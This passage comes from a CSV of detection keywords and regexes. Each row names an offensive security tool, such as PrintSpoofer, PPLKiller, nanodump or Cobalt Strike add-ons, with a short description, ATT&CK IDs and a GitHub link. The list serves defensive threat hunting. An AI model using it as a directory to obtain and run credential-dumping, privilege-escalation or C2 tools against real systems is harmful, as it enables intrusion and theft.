PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFault-Localhost-SMB.ps1*",".{0,1000}PPLFault\-Localhost\-SMB\.ps1.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLKiller.exe*",".{0,1000}PPLKiller\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller.sln*",".{0,1000}PPLKiller\.sln.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller.vcxproj*",".{0,1000}PPLKiller\.vcxproj.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller-master*",".{0,1000}PPLKiller\-master.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLmedicDll.def*",".{0,1000}PPLmedicDll\.def.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*PPLmedicDll.dll*",".{0,1000}PPLmedicDll\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*PppEWCIgXbsepIwnuRIHtQLC*",".{0,1000}PppEWCIgXbsepIwnuRIHtQLC.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ppypykatz.py*",".{0,1000}ppypykatz\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*praetorian.antihacker*",".{0,1000}praetorian\.antihacker.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*praetorian.com/blog/relaying-to-adfs-attacks/*",".{0,1000}praetorian\.com\/blog\/relaying\-to\-adfs\-attacks\/.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*praetorian-inc/ADFSRelay*",".{0,1000}praetorian\-inc\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*praetorian-inc/gato*",".{0,1000}praetorian\-inc\/gato.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*praetorian-inc/noseyparker*",".{0,1000}praetorian\-inc\/noseyparker.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*praetorian-inc/PortBender*",".{0,1000}praetorian\-inc\/PortBender.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*Prasadhak.ps1*",".{0,1000}Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*pre2k auth * --dc-ip *",".{0,1000}pre2k\sauth\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*prepare_ppl_command_line*",".{0,1000}prepare_ppl_command_line.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*prepareResponseForHiddenAPICall*",".{0,1000}prepareResponseForHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Prepouce/CoercedPotato*",".{0,1000}Prepouce\/CoercedPotato.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*Press a key to end PoC?*",".{0,1000}Press\sa\skey\sto\send\sPoC\?.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#contentstrings","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*PrimusC2-main.zip*",".{0,1000}PrimusC2\-main\.zip.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*print_shtinkering_crash_location*",".{0,1000}print_shtinkering_crash_location.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*printerbug.py *:*@* *",".{0,1000}printerbug\.py\s.{0,1000}\:.{0,1000}\@.{0,1000}\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PrinterNotifyPotato *",".{0,1000}PrinterNotifyPotato\s.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrinterNotifyPotato.*",".{0,1000}PrinterNotifyPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*Println(""DO WESTERN!!""*",".{0,1000}Println\(\""DO\sWESTERN!!\"".{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*PrintNightmare.*",".{0,1000}PrintNightmare\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*printnightmare_check*",".{0,1000}printnightmare_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*PrintNotifyPotato.exe*",".{0,1000}PrintNotifyPotato\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*PrintNotifyPotato-NET2.exe*",".{0,1000}PrintNotifyPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*printspoofer -Command*",".{0,1000}printspoofer\s\-Command.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer-*",".{0,1000}PrintSpoofer\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*PrintSpoofer.*",".{0,1000}PrintSpoofer\..{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer.exe*",".{0,1000}PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*printspoofer.exe*",".{0,1000}printspoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*printspoofer.py*",".{0,1000}printspoofer\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer.sln*",".{0,1000}PrintSpoofer\.sln.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer_x64.exe*",".{0,1000}PrintSpoofer_x64\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpooferNet.exe*",".{0,1000}PrintSpooferNet\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Priv Esc Check Bof*",".{0,1000}Priv\sEsc\sCheck\sBof.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*priv/priv_windows.go*",".{0,1000}priv\/priv_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 